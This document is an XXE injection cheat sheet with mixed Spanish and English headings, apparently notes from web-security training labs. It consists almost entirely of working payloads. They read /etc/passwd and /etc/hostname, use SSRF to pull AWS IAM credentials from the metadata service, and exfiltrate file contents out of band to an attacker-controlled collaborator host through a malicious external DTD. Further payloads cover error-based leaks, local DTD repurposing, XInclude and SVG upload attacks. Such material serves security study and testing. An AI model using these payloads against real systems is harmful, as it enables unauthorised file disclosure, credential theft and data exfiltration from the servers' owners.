XXE Injection

Entidades XML personalizadas

XML

<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>

Exploiting XXE — Retrieve files

XML — /etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
  <productId>
    &xxe;
  </productId>
</stockCheck>

Exploiting XXE — SSRF attacks

XML — AWS metadata

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck>
  <productId>1&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Blind XXE — Out-of-band interaction

Basic OOB

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.oastify.com"> ]>
<stockCheck>
  <productId>1&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Via XML parameter entities (%)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR.oastify.com"> %xxe; ]>
<stockCheck>
  <productId>1</productId>
  <storeId>2</storeId>
</stockCheck>

Blind XXE — Exfiltrate data via malicious external DTD

Request XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://EXPLOIT-SERVER.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

Payload en servidor externo (exploit)

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://COLLABORATOR.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;

Blind XXE — Retrieve data via error messages

Request XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://EXPLOIT-SERVER.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

Payload en servidor externo (error)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Exploiting XXE — Repurpose a local DTD

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

Hidden attack surface

XInclude attacks

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE via file upload (SVG)

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Otras formas de codificar `%`

&#x25;
&#37;

Entidades XML personalizadas

Exploiting XXE — Retrieve files

Exploiting XXE — SSRF attacks

Blind XXE — Out-of-band interaction

Blind XXE — Exfiltrate data via malicious external DTD

Blind XXE — Retrieve data via error messages

Exploiting XXE — Repurpose a local DTD

Hidden attack surface

XInclude attacks

XXE via file upload (SVG)

Otras formas de codificar %

Otras formas de codificar `%`